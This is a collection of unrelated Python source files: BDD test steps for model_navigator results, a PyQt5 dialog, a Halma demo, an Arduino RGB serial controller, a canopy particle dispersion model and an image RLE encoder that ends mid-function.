from pytest_bdd import then # pytype: disable=import-error
from pytest_bdd.parsers import parse # pytype: disable=import-error
from model_navigator.results import ResultsStore, State
from model_navigator.utils import Workspace
from model_navigator.utils.workspace import DEFAULT_WORKSPACE_PATH
from tests.utils.profile_results import get_profile_results
from tests.utils.triton_model_config import equal_model_configs_sets
@then(parse("the {command_name} subcommand results have {state} state and parameters matching:\n{parameters}"))
def the_command_results_should_have_given_state_and_parameters_matching(
    run_context, command_name: str, state: str, parameters: str
):
    """the {command_name} command results have {state} state and parameters matching:\n{parameters}"""
    # Load the stored results of the given subcommand from the workspace.
    workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
    results_store = ResultsStore(workspace)
    command_results = results_store.load(command_name.replace("-", "_"))
    # Every result must be in the expected state.
    expected_state = State(state.lower())
    results_states = [result.status.state for result in command_results]
    assert all(
        [actual_state == expected_state for actual_state in results_states]
    ), f"Results states: {results_states} while expecting: {expected_state}"
    # Parse "name=value" lines from the scenario's docstring table.
    parameters = parameters.splitlines() if parameters else []
    parameters = dict([tuple(parameter.split("=")) for parameter in parameters])

    def _get_parameter(parameter_name, actual_value):
        # Resolve a dotted path through attributes or dict keys.
        for part in parameter_name.split("."):
            if hasattr(actual_value, part):
                actual_value = getattr(actual_value, part)
            elif actual_value is not None:
                actual_value = actual_value.get(part, None)
        return actual_value

    for name, expected_value in parameters.items():
        actual_values = [_get_parameter(name, actual_value) for actual_value in command_results]
        # Coerce each actual value to the expected value's type (str, from
        # the parsed table) before comparing.
        actual_values = [
            type(expected_value)(actual_value) if expected_value is not None else actual_value
            for actual_value in actual_values
        ]
        assert all(
            [actual_value == expected_value for actual_value in actual_values]
        ), f"Actual values: {actual_values} while expecting {expected_value}"
@then(parse("the {command_name} subcommand results have {state} state"))
def the_command_results_should_have_given_state(run_context, command_name: str, state: str):
    """the {command_name} command results have {state} state"""
    workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
    store = ResultsStore(workspace)
    command_results = store.load(command_name.replace("-", "_"))
    expected_state = State(state.lower())
    results_states = [result.status.state for result in command_results]
    # Every stored result must report the expected state.
    mismatched = [s for s in results_states if s != expected_state]
    assert not mismatched, (
        f"Results states: {results_states} while expecting: {expected_state}"
    )
@then(parse("the command should {state}"))
def the_command_should_have_given_state(run_context, state: str):
    """the command should {state} ."""
    required_state = State(state.lower())
    # In non-interactive runs (e.g. CI), replay the captured output so it
    # appears in the test log.
    if not isinstance(sys.stdin, TextIOWrapper):
        for line in run_context.output.splitlines():
            print(line)
    message = f"the {run_context.cmd} should {state}"
    if required_state == State.SUCCEEDED:
        assert run_context.return_code == 0, message
    else:
        assert run_context.return_code != 0, message
@then(parse("the {model_name} model configs in latest profile checkpoint are\n{expected_configs_jsonlines}"))
def the_model_configs_in_latest_profile_checkpoint_are(run_context, model_name: str, expected_configs_jsonlines: str):
    """Check the profiled model configs against JSON-lines expectations."""

    def _filter_out_not_swappable_parameters(config):
        # Strip parameters that are not swappable between configs so the
        # comparison focuses on the swappable ones.
        for name in ["name", "platform", "backend", "version_policy", "input", "output"]:
            if name in config:
                del config[name]
        return config

    expected_configs = [json.loads(line) for line in expected_configs_jsonlines.splitlines()]
    workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
    profiling_results = get_profile_results(workspace)
    profiled_configs = [config.to_dict() for config, cmd_and_results in profiling_results[model_name].values()]
    profiled_configs = [_filter_out_not_swappable_parameters(config) for config in profiled_configs]
    # On mismatch, dump both sides before asserting for easier debugging.
    if not equal_model_configs_sets(profiled_configs, expected_configs):
        print("Profiled configs")
        for profiled_config in profiled_configs:
            print(json.dumps(profiled_config))
        print("Expected configs")
        for expected_config in expected_configs:
            print(json.dumps(expected_config))
    assert equal_model_configs_sets(profiled_configs, expected_configs)
@then(parse("the {model_name} model config in {model_repository} is equal to\n{expected_config_jsonline}"))
def the_model_configs_is_equal_to(run_context, model_name: str, model_repository: str, expected_config_jsonline: str):
    """Compare the config stored in the model repository against the expected JSON line."""
    expected_config = json.loads(expected_config_jsonline)
    config_dir = Path(run_context.cwd) / model_repository / model_name
    created_config = ModelConfig.create_from_file(config_dir.as_posix()).to_dict()
    if created_config != expected_config:
        print("Created config")
        print(json.dumps(created_config))
        print("Expected configs")
        print(json.dumps(expected_config))
    assert expected_config == created_config
@then(parse("the {model_name} model was profiled with {concurrency_levels} concurrency levels"))
def the_concurrency_in_latest_profile_checkpoint_are(run_context, model_name: str, concurrency_levels: str):
    """Verify the exact set of concurrency levels used by perf_analyzer while profiling `model_name`."""
    expected_concurrency = {int(level) for level in concurrency_levels.split(" ")}
    workspace = Workspace(Path(run_context.cwd) / DEFAULT_WORKSPACE_PATH)
    profiling_results = get_profile_results(workspace)
    used_concurrency = set()
    for _config, cmd_and_results in profiling_results[model_name].values():
        for measurement in cmd_and_results.values():
            used_concurrency.add(measurement.perf_config()["concurrency-range"])
    assert used_concurrency == expected_concurrency
@then(parse("the {pattern} pattern is present on command output"))
def substring_is_present_on_stderr(run_context, pattern: str):
    """Search the captured command output for `pattern` (case-insensitive regex)."""
    matches = re.findall(pattern, run_context.output, re.IGNORECASE)
    if not matches:
        # Dump the full output to make the failure diagnosable from logs.
        print(f"Searching for pattern: {pattern}")
        print("Command output:")
        for line in run_context.output.splitlines():
            print(line)
    assert matches
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ocrProfileNameDialog.ui'
#
# Created by: PyQt5 UI code generator 5.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_ocrNameDialog(object):
    # Auto-generated (pyuic5) UI class for the "OCR Profile Name" dialog:
    # an instructional label, a single-line edit for the profile name, and
    # an OK/Cancel button box stacked in a 3-row grid layout.
    # NOTE: generated from ocrProfileNameDialog.ui -- edits here are lost
    # on regeneration (see the file header warning); change the .ui instead.
    def setupUi(self, ocrNameDialog):
        # Build and lay out the dialog's widgets on `ocrNameDialog`.
        ocrNameDialog.setObjectName("ocrNameDialog")
        ocrNameDialog.resize(859, 203)
        # Fixed vertical size policy: the dialog may stretch horizontally only.
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(ocrNameDialog.sizePolicy().hasHeightForWidth())
        ocrNameDialog.setSizePolicy(sizePolicy)
        ocrNameDialog.setMinimumSize(QtCore.QSize(0, 0))
        ocrNameDialog.setMaximumSize(QtCore.QSize(16777215, 300))
        self.gridLayout = QtWidgets.QGridLayout(ocrNameDialog)
        self.gridLayout.setObjectName("gridLayout")
        # Row 0: instructional label (text assigned in retranslateUi).
        self.label = QtWidgets.QLabel(ocrNameDialog)
        self.label.setObjectName("label")
        self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
        # Row 1: line edit that receives the OCR profile name.
        self.profileNameEdit = QtWidgets.QLineEdit(ocrNameDialog)
        self.profileNameEdit.setObjectName("profileNameEdit")
        self.gridLayout.addWidget(self.profileNameEdit, 1, 0, 1, 1)
        # Row 2: standard OK/Cancel buttons wired to accept()/reject().
        self.buttonBox = QtWidgets.QDialogButtonBox(ocrNameDialog)
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.gridLayout.addWidget(self.buttonBox, 2, 0, 1, 1)
        self.retranslateUi(ocrNameDialog)
        self.buttonBox.accepted.connect(ocrNameDialog.accept)
        self.buttonBox.rejected.connect(ocrNameDialog.reject)
        QtCore.QMetaObject.connectSlotsByName(ocrNameDialog)
    def retranslateUi(self, ocrNameDialog):
        # Assign all user-visible strings (kept separate so Qt's translation
        # tooling can retranslate without rebuilding the widget tree).
        _translate = QtCore.QCoreApplication.translate
        ocrNameDialog.setWindowTitle(_translate("ocrNameDialog", "OCR Profile Name "))
        self.label.setText(_translate("ocrNameDialog", "<html><head/><body><p>It is important to clearly identify a saved OCR profile. A minimum is:</p><p>1) Initials of user (because it is possible to share your profiles with other users) +</p><p>2) Equipment chain: camera(PAL/NTSC) VTI frame-grabber</p><p>For example: RLA Watec-910-NTSC IOTA-VTI3 svid2usb2</p></body></html>"))
|
# -*- coding: utf-8 -*-
"""
Halma
@author: Mursito
"""
from halma_model import HalmaModel

# Demo driver: initialize a board, dump its state, then list the legal
# moves (shifts and jumps) for every piece belonging to player 1.
game = HalmaModel()
game.awal(0, 0)
board = game.getPapan()
print("PAPAN---------------------------")
print(board)
pieces = game.getPosisiBidak(1)
print("POSISI BIDAK---------------------------")
print(pieces)
for cell in pieces:
    print("BIDAK: ", game.getBidak(cell[0], cell[1]), cell, "----------------")
    shifts, jumps = game.bisaMain(cell[0], cell[1])
    print("Geser : ", shifts)
    print("Loncat: ", jumps)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import serial, time
class SyncError(Exception):
    """Raised when the serial handshake with the Arduino fails.

    msg -- optional human-readable description (coerced to str).
    """
    def __init__(self, msg=""):
        self._msg = str(msg)
    def __str__(self):
        # BUG FIX: previously returned the undefined name `msg`, which
        # raised NameError whenever the exception was printed/formatted.
        return self._msg
class SerialRGB(object):
    """Easy controlling of the RGB-LED / Arduino"""
    def __init__(self, addr, baud=9600):
        """
        Creating a new SerialRGB object.

        addr -- The address of the serial port.
        baud -- The baudrate (default: 9600)

        Raises IOError if the port cannot be opened and SyncError if the
        handshake with the Arduino fails.
        """
        # BUG FIX: initialize `ser` before attempting to open the port, so
        # __del__/close_connection never raise AttributeError when
        # serial.Serial() itself fails.
        self.ser = None
        try:
            self.ser = serial.Serial(addr, baud)
        except Exception:
            # narrowed from a bare `except:` (which would also have
            # swallowed KeyboardInterrupt/SystemExit)
            raise IOError("Could not connect to Arduino via serial port.")
        # Sync: poke the Arduino until it replies, then expect an ACK ("1").
        while self.ser.inWaiting() < 1:
            self.ser.write("\x00")
            time.sleep(.01)
        if self.ser.read(1) != "1":
            raise SyncError
    def __del__(self):
        self.close_connection()
    def change_color(self, color):
        """
        Send a color to the Arduino.

        color - 3-Tuple representing an RGB-Color (color components must be in range 0 - 255).

        Raises SyncError if the Arduino does not acknowledge the command.
        """
        r, g, b = color
        self.ser.write(chr(r) + chr(g) + chr(b))
        if self.ser.read(1) != "1":
            raise SyncError
    def close_connection(self):
        """Closes the connection to the Arduino. Safe to call repeatedly."""
        # getattr guard keeps this safe even on partially-constructed objects.
        if getattr(self, "ser", None) is not None:
            self.ser.close()
            self.ser = None
|
"""
`Model` class for running the LPD model.
"""
import importlib
import math
import warnings
from copy import deepcopy as copy
import numpy as np
from . import lpd
from .utils import disable_numba
from .utils import enable_numba
from .utils import numbify
from .utils import unnumbify
__all__ = (
"Model",
"INPUT_PARAM_DEFAULTS",
"calc_MW_derived_params",
"compare_params",
)
INPUT_PARAM_DEFAULTS = {
#
# particle sources
"release_height": 1.05, # m; really should draw from a distribution of release heights for each particle!!
"source_positions": [(0, 0)], # point locs of the particle sources; must be iterable
"dNp_per_dt_per_source": 2, # should be int
#
# canopy
"canopy_height": 1.1, # m; h / h_c
"total_LAI": 2.0, # (total) leaf area index
"foliage_drag_coeff": 0.2, # C_d
#
# turbulence
"ustar": 0.25, # m; u_*; friction velocity above canopy (assuming const shear layer)
"von_Karman_constant": 0.4, # k
"Kolmogorov_C0": 5.5,
#
# run options
"dt": 0.25, # s; time step for the 1-O Newton FT scheme; this is what Pratt used
"t_tot": 100.0, # s; total time of the run
"dt_out": 1.0,
"continuous_release": True,
"use_numba": True,
"chemistry_on": False,
#
# chemistry
"fv_0": {}, # fv: floral volatiles. initial values (mol, ug, or somesuch) can be provided here.
"n_air_cm3": 2.62e19, # (dry) air number density (molec cm^-3)
"oxidants_ppbv": {"O3": 40.0, "OH": 1.0e-4, "NO3": 1.0e-5},
#
# Massman and Weil (MW) canopy wind model parameters (could be dict)
"MW_c1": 0.28, # c's for above-canopy wind profile
"MW_c2": 0.37,
"MW_c3": 15.1,
"MW_gam1": 2.40, # gam_i = sig_i/u_star (velocity std's above canopy, in sfc layer)
"MW_gam2": 1.90,
"MW_gam3": 1.25,
"MW_alpha": 0.05, # parameter that controls in-canopy sigma_w and sigma_u
"MW_A2": 0.6 # appears to be unused, but is part of their model
# only alpha and A_1 are empirical constants (MW p. 89)
}
"""
Input parameter defaults.
"""
# could do more dict nesting like in pyAPES...
# TODO: opposite of this -- calculate above MW params from normal wind params
def calc_MW_derived_params(p):
    r"""Calculate Massman and Weil (1999) parameters
    from the base wind profile parameters
    $c_i$, $\gamma_i$, $\alpha$ ($i = 1\colon3$)
    and other model input parameters.

    References
    ----------
    * [Massman and Weil (1999)](https://doi.org/10.1023/A:1001810204560) [MW]
    """
    drag = p["foliage_drag_coeff"]
    ustar = p["ustar"]
    lai = p["total_LAI"]
    h_c = p["canopy_height"]
    kappa = p["von_Karman_constant"]
    c1, c2, c3 = p["MW_c1"], p["MW_c2"], p["MW_c3"]
    gam1, gam2, gam3 = p["MW_gam1"], p["MW_gam2"], p["MW_gam3"]
    alpha = p["MW_alpha"]
    # Velocity-variance combinations nu_i (MW p. 86)
    gam_sq_sum = gam1 ** 2 + gam2 ** 2 + gam3 ** 2
    nu1 = gam_sq_sum ** (-0.5)
    nu3 = gam_sq_sum ** (1.5)
    nu2 = nu3 / 6 - gam3 ** 2 / (2 * nu1)
    # Simplified Lambda^2 expression (MW p. 87); the full first form is
    # 7/(3 a^2 nu1 nu3) + [1/3 - gam3^2 nu1^2]/(3 a^2 nu1 nu2)
    Lam = math.sqrt(3 * nu1 ** 2 / alpha ** 2)
    # Mean wind speed at canopy top u(h) (MW Eq. 5)
    uh = ustar / (c1 - c2 * math.exp(-c3 * drag * lai))
    # Canopy wind-profile exponent (MW Eq. 4; "n", not "nu")
    n = drag * lai / (2 * ustar ** 2 / uh ** 2)
    B1 = -(9 * ustar / uh) / (2 * alpha * nu1 * (9 / 4 - Lam ** 2 * ustar ** 4 / uh ** 4))
    # Displacement height and roughness length from the exponential profile
    d = h_c * (1 - (1 / (2 * n)) * (1 - math.exp(-2 * n)))
    z0 = (h_c - d) * math.exp(-kappa * uh / ustar)
    # TKE dissipation rates at canopy top; their comparison selects the
    # matching approach (Massman and Weil)
    epsilon_ah = (ustar ** 3) / (kappa * (h_c - d))
    sig_eh = ustar * (nu3) ** (1 / 3)  # not used elsewhere
    epsilon_ch = sig_eh ** 3 * (drag * lai / h_c) / (nu3 * alpha)
    return {
        "MW_nu1": nu1,
        "MW_nu2": nu2,
        "MW_nu3": nu3,
        "MW_Lam": Lam,
        "MW_n": n,
        "MW_B1": B1,
        "U_h": uh,  # mean wind speed at canopy height U(h)
        "displacement_height": d,
        "roughness_length": z0,
        "MW_epsilon_a_h": epsilon_ah,  # above-canopy TKE dissipation rate at h
        "MW_epsilon_c_h": epsilon_ch,  # in-canopy " "
        "MW_epsilon_ah_gt_ch": epsilon_ah >= epsilon_ch,
    }
def compare_params(p, p0=None, input_params_only=False, print_message=True):
    """Compare parameters dict `p` to reference `p0` and return True if equal.

    `p0` defaults to the parameters of a freshly constructed `Model`.
    Use `input_params_only=True` to restrict the printed report to keys in
    `INPUT_PARAM_DEFAULTS`; `print_message=False` suppresses all output.
    """
    if p0 is None:
        p0 = Model().p
        p0_name = "default"
    else:
        p0_name = "reference"
    # Equality is judged over *all* reference keys, before any filtering.
    same = not any(p[key] != p0[key] for key in p0)
    if input_params_only:
        p0 = {key: val for key, val in p0.items() if key in INPUT_PARAM_DEFAULTS}
    if print_message:
        header = f"parameter: {p0_name} --> current"
        print(header)
        print("-" * len(header))
    # sort case-insensitively so uppercase keys aren't grouped separately
    for key, ref_val in sorted(p0.items(), key=lambda kv: kv[0].lower()):
        cur_val = p[key]
        if ref_val != cur_val and print_message:
            print(f"'{key}': {ref_val} --> {cur_val}")
    if same and print_message:
        print(f"all params same as {p0_name}")
    return same
class Model:
    """The LPD model."""

    # class variables (as opposed to instance)
    _p_user_input_default = INPUT_PARAM_DEFAULTS
    _p_default_MW = calc_MW_derived_params(_p_user_input_default)
    _p_input_default = {**_p_user_input_default, **_p_default_MW}

    def __init__(self, p=None):
        """
        Parameters
        ----------
        p : dict
            User-supplied input parameters (to update the defaults (`INPUT_PARAM_DEFAULTS`)).
            `Model.update_p` can also be used to update parameters
            after creating the `Model` instance.
        """
        self.p = copy(Model._p_input_default)  # start with defaults
        """Model parameters dict. This includes both *input* and *derived*
        parameters and so should not be modified directly
        (instead use `Model.update_p`).
        """
        if p is None:
            p = {}
        self.update_p(**p)  # calculate derived params
        # checks (could move to separate `check_p` method or to `update_p`)
        assert (
            self.p["release_height"] <= self.p["canopy_height"]
        ), "particles must be released within canopy"
        assert (
            np.modf(self.p["dt_out"] / self.p["dt"])[0] == 0
        ), "output interval must be a multiple of dt"
        self._init_state()
        self._init_hist()

    def update_p(self, **kwargs):
        """Use `**kwargs` (allowed user input parameters only) to check/update all model parameters
        (in place). Unknown keys are ignored with a warning. Returns `self`.
        """
        allowed_keys = self._p_user_input_default.keys()
        for k, v in kwargs.items():
            if k not in allowed_keys:
                msg = f"key '{k}' is not in the default parameter list. ignoring it."
                warnings.warn(msg)
            else:
                if isinstance(v, dict):
                    self.p[k].update(v)
                else:
                    self.p[k] = v
        # calculated parameters (probably should be in setter methods or something to prevent inconsistencies)
        # i.e., user changing them without using `update_p`
        self.p["N_sources"] = len(self.p["source_positions"])
        # calculate oxidant concentrations from ppbv values and air number density
        n_a = self.p["n_air_cm3"]
        conc_ox = {}
        for ox_name, ox_ppbv in self.p["oxidants_ppbv"].items():
            conc_ox[ox_name] = n_a * ox_ppbv * 1e-9
        self.p.update({"conc_oxidants": conc_ox})
        # calculate number of time steps: N_t from t_tot
        t_tot = self.p["t_tot"]
        dt = self.p["dt"]
        N_t = math.floor(t_tot / dt)  # number of time steps
        if abs(N_t - t_tot / dt) > 0.01:
            msg = f"N was rounded down from {t_tot/dt:.4f} to {N_t}"
            warnings.warn(msg)
        self.p["N_t"] = N_t  # TODO: consistentify style between N_p and N_t
        # calculate total run number of particles: Np_tot
        dNp_dt_ds = self.p["dNp_per_dt_per_source"]
        N_s = self.p["N_sources"]
        if self.p["continuous_release"]:
            Np_tot = N_t * dNp_dt_ds * N_s
            Np_tot_per_source = int(Np_tot / N_s)
        else:
            Np_tot = dNp_dt_ds * N_s
            Np_tot_per_source = dNp_dt_ds
        self.p["Np_tot"] = Np_tot
        self.p["Np_tot_per_source"] = Np_tot_per_source
        # some variables change the lengths of the state and hist arrays
        if any(
            k in kwargs
            for k in ["t_tot", "dNp_per_dt_per_source", "N_sources", "continuous_release"]
        ):
            self._init_state()
            self._init_hist()
        # some variables affect the derived MW variables
        #
        # these are the non-model-parameter inputs:
        MW_inputs = [
            "foliage_drag_coeff",
            "ustar",
            "total_LAI",
            "canopy_height",
            "von_Karman_constant",
        ]
        # check for these and also the MW model parameters
        if any(k in kwargs for k in MW_inputs) or any(k[:2] == "MW" for k in kwargs):
            self.p.update(calc_MW_derived_params(self.p))
        return self

    # TODO: could change self.p to self._p, but have self.p return a view,
    # but give error if user tries to set items

    # TODO: init conc at this time too?
    def _init_state(self):
        """Allocate particle position/velocity arrays and place each particle
        at its source, interleaved by release time.
        """
        Np_tot = self.p["Np_tot"]
        # also could do as 3-D? (x,y,z coords)
        # particle positions
        xp = np.empty((Np_tot,))
        yp = np.empty((Np_tot,))
        zp = np.empty((Np_tot,))
        # local wind speed (perturbation?) at particle positions
        up = np.zeros((Np_tot,))  # should initial u be = horiz wind speed? or + a perturbation?
        vp = np.zeros((Np_tot,))
        wp = np.zeros((Np_tot,))
        # seems ideal to generate sources and initial pos for each before going into time loop
        # can't be generator because we go over them multiple times
        # but could have a generator that generatoes that sources for each time step?
        N_sources = self.p["N_sources"]
        Np_tot_per_source = self.p["Np_tot_per_source"]
        release_height = self.p["release_height"]
        source_positions = self.p["source_positions"]
        for isource in range(N_sources):
            ib = isource * Np_tot_per_source
            ie = (isource + 1) * Np_tot_per_source
            xp[ib:ie] = source_positions[isource][0]
            yp[ib:ie] = source_positions[isource][1]
            zp[ib:ie] = release_height
        # rearrange by time (instead of by source)
        for p_ in (xp, yp, zp):
            groups = []
            for isource in range(N_sources):
                ib = isource * Np_tot_per_source
                ie = (isource + 1) * Np_tot_per_source
                groups.append(p_[ib:ie])
            p_[:] = np.column_stack(groups).flatten()
        # assuming sources same strength everywhere for now
        self.state = {
            # 'k': 0,
            # 't': 0,
            # 'Np_k': 0,
            "xp": xp,
            "yp": yp,
            "zp": zp,
            "up": up,
            "vp": vp,
            "wp": wp,
        }

    def _init_hist(self):
        """Set up the history arrays (`self.hist`) for single-release runs;
        for continuous release `self.hist` is set to False.
        """
        if self.p["continuous_release"]:
            hist = False
        else:
            # set up hist if dt_out
            # should use xarray for this (and for other stuff too; like sympl)
            if self.p["dt_out"] <= 0:
                raise ValueError("dt_out must be pos. to use single-release mode")
            # TODO: should be ok to do continuous_release without hist if want
            t_tot = self.p["t_tot"]
            dt_out = self.p["dt_out"]
            Np_tot = self.p["Np_tot"]
            hist = dict()
            N_t_hist = int(t_tot / dt_out) + 1
            hist["pos"] = np.empty((Np_tot, N_t_hist, 3))  # particle, x, y, z
            hist["ws"] = np.empty((Np_tot, N_t_hist, 3))
            # could use list instead of particle dim
            # to allow for those with different record lengths
            xp = self.state["xp"]
            yp = self.state["yp"]
            zp = self.state["zp"]
            up = self.state["up"]
            vp = self.state["vp"]
            wp = self.state["wp"]
            hist["pos"][:, 0, :] = np.column_stack((xp, yp, zp))  # initial positions
            hist["ws"][:, 0, :] = np.column_stack((up, vp, wp))
        self.hist = hist

    def run(self):
        """Run the LPD model, integrating the particles using
        `blpd.lpd.integrate_particles_one_timestep`.
        """
        import datetime

        # TODO: change to `time.perf_counter` for this?
        self._clock_time_run_start = datetime.datetime.now()
        Np_k = 0  # initially tracking 0 particles
        # Np_tot = self.p['Np_tot']
        dt = self.p["dt"]
        dt_out = self.p["dt_out"]
        N_t = self.p["N_t"]  # number of time steps
        # t_tot = self.p['t_tot']
        dNp_dt_ds = self.p["dNp_per_dt_per_source"]
        N_s = self.p["N_sources"]
        # outer loop could be particles instead of time. might make some parallelization easier
        # init of hist and state could go here
        if self.p["use_numba"]:
            enable_numba()  # ensure numba compilation is not disabled
            # > prepare p for numba
            p_for_nb = {k: v for k, v in self.p.items() if not isinstance(v, (str, list, dict))}
            # p_for_nb = {k: v for k, v in self.p.items() if isinstance(v, (int, float, np.ndarray))}
            # p_nb = numbify(p_for_nb)
            p_nb = numbify(p_for_nb, zerod_only=True)  # only floats/ints
            # > prepare state for numba
            # leaving out t and k for now, pass as arguments instead
            # state_for_nb = {k: v for k, v in self.state.items() if k in ('xp', 'yp', 'zp', 'up', 'vp', 'wp')}
            state_for_nb = self.state
            state_nb = numbify(state_for_nb)
            # for debug
            self.p_nb = p_nb
            self.state_nb = state_nb
            state_run = state_nb
            p_run = p_nb
        else:  # model is set not to use numba (for checking the performance advantage of using numba)
            disable_numba()  # disable numba compilation
            state_run = self.state
            p_run = self.p
        # changing numba config in lpd redefines the njit decorated functions
        # but that isn't recognized right away unless we do this re-import
        # reloading numba in lpd doesn't seem to work
        # - at least not the first time trying to run after changing use_numba True->False
        importlib.reload(lpd)
        # print(state_run['xp'].shape)
        for k in range(1, N_t + 1):
            if self.p["continuous_release"]:
                Np_k += dNp_dt_ds * N_s
            else:  # only release at k=1 (at k=0 the particles are inside their release point)
                if k == 1:
                    Np_k += dNp_dt_ds * N_s
                else:
                    pass
            t = k * dt  # current (elapsed) time
            if self.p["use_numba"]:
                state_run.update(numbify({"k": k, "t": t, "Np_k": Np_k}))
            else:
                state_run.update({"k": [k], "t": [t], "Np_k": [Np_k]})
            # print(state_run['xp'].shape)
            # pass numba-ified dicts here
            lpd.integrate_particles_one_timestep(state_run, p_run)
            # integrate_particles_one_timestep(state_run, p_run)
            # TODO: option to save avg / other stats in addition to instantaneous? or specify avg vs instant?
            if self.hist is not False:
                # NOTE(review): float modulo for output timing -- assumes t
                # lands exactly on multiples of dt_out; confirm for dt values
                # that are not exactly representable in binary
                if t % dt_out == 0:
                    o = int(t // dt_out)  # note that `int()` floors anyway
                    xp = state_run["xp"]
                    yp = state_run["yp"]
                    zp = state_run["zp"]
                    up = state_run["up"]
                    vp = state_run["vp"]
                    wp = state_run["wp"]
                    self.hist["pos"][:, o, :] = np.column_stack((xp, yp, zp))
                    self.hist["ws"][:, o, :] = np.column_stack((up, vp, wp))
        if self.p["use_numba"]:
            self.state = unnumbify(state_run)
        else:
            self.state = state_run
        self._clock_time_run_end = datetime.datetime.now()
        # self._maybe_run_chem()
        return self

    # def _maybe_run_chem(self):
    #     # note: adds conc dataset to self.state
    #     # this check/correction logic could be somewhere else
    #     if self.p['chemistry_on']:
    #         if not self.p['continuous_release']:
    #             warnings.warn(
    #                 'chemistry is calculated only for the continuous release option (`continuous_release=True`). not calculating chemistry',
    #                 stacklevel=2,
    #             )
    #             self.p['chemistry_on'] = False
    #     if self.p["chemistry_on"]:
    #         conc = chem_calc_options["fixed_oxidants"](self.to_xarray())
    #     else:
    #         conc = False
    #     self.state.update({
    #         'conc': conc
    #     })
    #     # maybe should instead remove 'conc' from state if not doing chem

    def to_xarray(self):
        """Create and return an `xr.Dataset` of the LPD run."""
        # TODO: smoothing/skipping options to reduce storage needed?
        import json

        import xarray as xr

        ip_coord_tup = (
            "ip",
            np.arange(self.p["Np_tot"]),
            {"long_name": "Lagrangian particle index"},
        )
        if self.hist:  # continuous release run
            t = np.arange(0, self.p["t_tot"] + self.p["dt_out"], self.p["dt_out"])
            # ^ note can use `pd.to_timedelta(t, unit="s")`
            dims = ("ip", "t")
            coords = {
                "ip": ip_coord_tup,
                "t": ("t", t, {"long_name": "Simulation elapsed time", "units": "s"}),
            }
            x = self.hist["pos"][..., 0]
            y = self.hist["pos"][..., 1]
            z = self.hist["pos"][..., 2]
            u = self.hist["ws"][..., 0]
            v = self.hist["ws"][..., 1]
            w = self.hist["ws"][..., 2]
        else:  # no hist, only current state
            dims = ("ip",)
            coords = {"ip": ip_coord_tup}
            x = self.state["xp"]
            y = self.state["yp"]
            z = self.state["zp"]
            u = self.state["up"]
            v = self.state["vp"]
            w = self.state["wp"]
        data_vars = {
            "x": (dims, x, {"long_name": "$x$", "units": "m"}),
            "y": (dims, y, {"long_name": "$y$", "units": "m"}),
            "z": (dims, z, {"long_name": "$z$", "units": "m"}),
            "u": (dims, u, {"long_name": "$u$", "units": "m s$^{-1}$"}),
            "v": (dims, v, {"long_name": "$v$", "units": "m s$^{-1}$"}),
            "w": (dims, w, {"long_name": "$w$", "units": "m s$^{-1}$"}),
        }
        # Serialize model parameters in JSON to allow saving in netCDF and loading later
        attrs = {
            "run_completed": self._clock_time_run_end,
            "run_runtime": self._clock_time_run_end - self._clock_time_run_start,
            # TODO: package version once the packaging is better...
            "p_json": json.dumps(self.p),
        }
        ds = xr.Dataset(
            coords=coords,
            data_vars=data_vars,
            attrs=attrs,
        )
        # TODO: Add extra useful coordinates: t_out for non-hist and t as Timedelta for hist
        return ds

    def to_xr(self):
        """Alias of `Model.to_xarray`."""
        # BUG FIX: previously this alias returned None (missing `return`).
        return self.to_xarray()

    def plot(self, **kwargs):
        """Make a plot of the results (type based on run type).

        `**kwargs` are passed through to the relevant plotting function.

        * single release: `blpd.plot.trajectories`
        * continuous release: `blpd.plot.final_pos_scatter`
        """
        # first check if model has been run
        p = self.p
        state = self.state
        hist = self.hist
        from . import plot

        if np.all(state["up"] == 0):  # model probably hasn't been run
            pass  # silently do nothing for now
        else:
            if (p["continuous_release"] is False) and hist:
                plot.trajectories(self.to_xarray(), **kwargs)
            else:
                plot.final_pos_scatter(self.to_xarray(), **kwargs)
|
from PIL import Image
from colormap import *
import os
def image_read(img_s):
    """Read image file *img_s* and return its pixels as a list of 4-char
    lowercase hex strings in RGB565 format, row-major order.

    Pure black ("0000") is remapped to "0020" because "0000" is reserved
    as the run marker by `RLE_compresse`.
    """
    img = Image.open(img_s)
    largeur, hauteur = img.size
    pixels = []
    for y in range(hauteur):
        for x in range(largeur):
            # NOTE(review): assumes an RGB image; RGBA or paletted input
            # would break this 3-tuple unpacking -- confirm inputs or
            # convert with img.convert("RGB")
            r, v, b = img.getpixel((x, y))
            # pack 8-bit channels into 16-bit RGB565 (5 red, 6 green, 5 blue)
            rgb565 = (((r & 248) << 8) + ((v & 252) << 3) + ((b & 248) >> 3))
            # rgb565 <= 0xFFFF, so zfill(4) reproduces the old pad loop
            # (which also made the old `len != 4` error check unreachable)
            color = hex(rgb565)[2:].zfill(4)
            if color == "0000":
                color = "0020"  # keep "0000" free for the RLE marker
            pixels.append(color)
    return pixels
def RLE_compresse(l):
    # Run-length encode a list of 4-char hex pixel strings.
    # Runs of 3 or more equal values (capped at 255) are emitted as the
    # triple: "0000" (marker), 2-char hex run length, pixel value.
    # Shorter runs are emitted verbatim (a pair would cost 3 tokens, so
    # compressing it would not help). "0000" never appears as a pixel:
    # image_read remaps it to "0020".
    lf=[]
    i=0
    c=1  # current run length
    p=0  # flag: 1 while extending a confirmed (3+) run
    while i <= len(l)-1:
        try:
            # Look ahead while the next pixel matches the current one.
            while l[i]==l[i+1] :
                # Only start counting once at least 3 equal pixels are seen
                # (or we are already inside a confirmed run).
                if l[i]==l[i+1]==l[i+2] or p==1:
                    p=1
                    i+=1
                    c+=1
                    col=l[i]
                    if c==255 : break  # run length must fit in one byte
                else:break
            p=0
        except:pass  # IndexError: lookahead ran past the end of the list
        if c!=1 :
